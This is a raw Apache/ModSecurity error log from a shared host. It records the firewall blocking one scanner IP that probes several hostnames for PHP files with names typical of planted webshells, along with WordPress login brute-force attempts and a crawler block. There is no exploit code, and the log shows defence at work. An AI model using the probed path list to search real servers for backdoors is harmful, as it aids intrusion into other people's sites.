[Tue May 26 19:37:40.600930 2026] [security2:error] [pid 70836:tid 70871] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/96i.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvsgABAyI"]
[Tue May 26 19:37:40.602023 2026] [security2:error] [pid 70836:tid 70872] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/155.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvswAAxCM"]
[Tue May 26 19:37:40.664768 2026] [security2:error] [pid 70836:tid 70873] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvtwAAkiQ"]
[Tue May 26 19:37:40.725617 2026] [security2:error] [pid 70836:tid 70876] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/96i.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvuwAAwSc"]
[Tue May 26 19:37:40.727937 2026] [security2:error] [pid 70836:tid 70884] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/as.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvvAAA1S8"]
[Tue May 26 19:37:40.738442 2026] [security2:error] [pid 70836:tid 70877] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/155.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvvgAA6Sg"]
[Tue May 26 19:37:40.825010 2026] [security2:error] [pid 70836:tid 70880] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/as.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvxAAA9ys"]
[Tue May 26 19:37:40.830911 2026] [security2:error] [pid 70836:tid 70956] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/min.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvxQAAoHc"]
[Tue May 26 19:37:40.847681 2026] [security2:error] [pid 70836:tid 70957] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/96i.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvxgAA3Hg"]
[Tue May 26 19:37:40.910375 2026] [security2:error] [pid 70836:tid 71027] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvpQAAAMI"]
[Tue May 26 19:37:40.942932 2026] [security2:error] [pid 70836:tid 70891] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/min.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvxwAAujY"]
[Tue May 26 19:37:40.943466 2026] [security2:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/as.php"] [unique_id "ahWpLO_FvbQ_BhqVMRVvyAAA5Hs"]
[Tue May 26 19:37:40.945043 2026] [proxy:error] [pid 70836:tid 70960] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:40.945081 2026] [proxy_http:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:40.945671 2026] [proxy:error] [pid 70836:tid 70960] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:40.945745 2026] [proxy_http:error] [pid 70836:tid 70960] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:41.025719 2026] [security2:error] [pid 70836:tid 70961] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/php8.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVvygAAsHw"]
[Tue May 26 19:37:41.057411 2026] [security2:error] [pid 70836:tid 70890] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/min.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVvzQAAkTU"]
[Tue May 26 19:37:41.105408 2026] [security2:error] [pid 70836:tid 70892] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/admin.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv0gAA_zc"]
[Tue May 26 19:37:41.143765 2026] [security2:error] [pid 70836:tid 70893] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/php8.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv1AAAkzg"]
[Tue May 26 19:37:41.201292 2026] [security2:error] [pid 70836:tid 70899] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/222.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv2AAArz4"]
[Tue May 26 19:37:41.218994 2026] [security2:error] [pid 70836:tid 70898] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/admin.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv2QAA3j0"]
[Tue May 26 19:37:41.278647 2026] [security2:error] [pid 70836:tid 70901] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv3AAA4UA"]
[Tue May 26 19:37:41.297564 2026] [security2:error] [pid 70836:tid 70883] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/222.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv4QAA1i4"]
[Tue May 26 19:37:41.345551 2026] [security2:error] [pid 70836:tid 70906] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/php8.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv5gAA1EU"]
[Tue May 26 19:37:41.357518 2026] [security2:error] [pid 70836:tid 70907] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/info.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv5wAAj0Y"]
[Tue May 26 19:37:41.373689 2026] [security2:error] [pid 70836:tid 70888] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv6gAAijM"]
[Tue May 26 19:37:41.420569 2026] [security2:error] [pid 70836:tid 70889] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/admin.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv7wAAzjQ"]
[Tue May 26 19:37:41.434565 2026] [security2:error] [pid 70836:tid 70908] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/a.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv8AAAqUc"]
[Tue May 26 19:37:41.469599 2026] [security2:error] [pid 70836:tid 70896] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/info.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv8QAAiDs"]
[Tue May 26 19:37:41.497126 2026] [security2:error] [pid 70836:tid 70894] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/222.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv8gAAyzk"]
[Tue May 26 19:37:41.501424 2026] [security2:error] [pid 70836:tid 71050] [client 152.42.186.39:62402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 39.186.42.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "keydussecurity.com"] [uri "/wp-login.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv8wAAANk"], referer: https://duckduckgo.com/
[Tue May 26 19:37:41.514156 2026] [security2:error] [pid 70836:tid 70897] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/chosen.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv9AAAqzw"]
[Tue May 26 19:37:41.545083 2026] [security2:error] [pid 70836:tid 70902] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/a.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv9QAAmEE"]
[Tue May 26 19:37:41.572395 2026] [security2:error] [pid 70836:tid 70903] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/themes/pridmag/il.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv9gAAokI"]
[Tue May 26 19:37:41.595721 2026] [security2:error] [pid 70836:tid 70905] [remote 54.39.203.235:32636] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahWpLe_FvbQ_BhqVMRVv9wAAqkQ"]
[Tue May 26 19:37:41.595877 2026] [security2:error] [pid 70836:tid 71003] [client 54.39.203.235:32636] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "panda-eco.com"] [uri "/"] [unique_id "ahWpLe_FvbQ_BhqVMRVv9wAAqkQ"]
[Tue May 26 19:37:41.609412 2026] [security2:error] [pid 70836:tid 70904] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-content/index.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv-AAAz0M"]
[Tue May 26 19:37:41.619817 2026] [security2:error] [pid 70836:tid 70909] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/chosen.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv-QAA2Eg"]
[Tue May 26 19:37:41.648482 2026] [security2:error] [pid 70836:tid 70928] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/info.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVv-gAAuFs"]
[Tue May 26 19:37:41.686931 2026] [security2:error] [pid 70836:tid 70930] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/vx.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwAQAAwV0"]
[Tue May 26 19:37:41.695115 2026] [security2:error] [pid 70836:tid 70932] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-content/index.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwAgAA1V8"]
[Tue May 26 19:37:41.723843 2026] [security2:error] [pid 70836:tid 70931] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/a.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwAwAA6V4"]
[Tue May 26 19:37:41.774893 2026] [security2:error] [pid 70836:tid 70941] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/vx.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwCgAA3Gg"]
[Tue May 26 19:37:41.775954 2026] [proxy:error] [pid 70836:tid 70939] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:41.775996 2026] [proxy_http:error] [pid 70836:tid 70939] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:41.776568 2026] [proxy:error] [pid 70836:tid 70939] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:37:41.776600 2026] [proxy_http:error] [pid 70836:tid 70939] [remote 20.151.117.104:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:37:41.799291 2026] [security2:error] [pid 70836:tid 70942] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/chosen.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwCwAA-2k"]
[Tue May 26 19:37:41.856338 2026] [security2:error] [pid 70836:tid 70913] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wap.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwDwAA8Uw"]
[Tue May 26 19:37:41.874769 2026] [security2:error] [pid 70836:tid 70914] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wp-content/index.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwEAAAl00"]
[Tue May 26 19:37:41.938322 2026] [security2:error] [pid 70836:tid 70915] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-admin/wp.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwFAAAkE4"]
[Tue May 26 19:37:41.938776 2026] [security2:error] [pid 70836:tid 70938] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wap.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwFQAAsGU"]
[Tue May 26 19:37:41.950055 2026] [security2:error] [pid 70836:tid 70917] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/vx.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwFgAAoVA"]
[Tue May 26 19:37:42.015224 2026] [security2:error] [pid 70836:tid 70918] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/wp-admin/wp.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwFwAAm1E"]
[Tue May 26 19:37:42.015792 2026] [security2:error] [pid 70836:tid 70919] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/bgymj.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwGAAA11I"]
[Tue May 26 19:37:42.016438 2026] [security2:error] [pid 70836:tid 70912] [remote 123.30.233.13:33884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWpLe_FvbQ_BhqVMRVwDQAA7ks"]
[Tue May 26 19:37:42.104678 2026] [security2:error] [pid 70836:tid 70923] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/bgymj.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwHgAAhVY"]
[Tue May 26 19:37:42.106392 2026] [security2:error] [pid 70836:tid 70924] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/aa.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwHwAAk1c"]
[Tue May 26 19:37:42.179939 2026] [security2:error] [pid 70836:tid 70916] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webdisk.digitalgerminate.com"] [uri "/aa.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwJgAA9U8"]
[Tue May 26 19:37:42.184020 2026] [security2:error] [pid 70836:tid 70925] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcalendars.digitalgerminate.com"] [uri "/wp-mail.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwJwABAVg"]
[Tue May 26 19:37:42.202543 2026] [security2:error] [pid 70836:tid 70911] [remote 20.151.117.104:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.digitalgerminate.com"] [uri "/wap.php"] [unique_id "ahWpLu_FvbQ_BhqVMRVwKgAAr0o"]
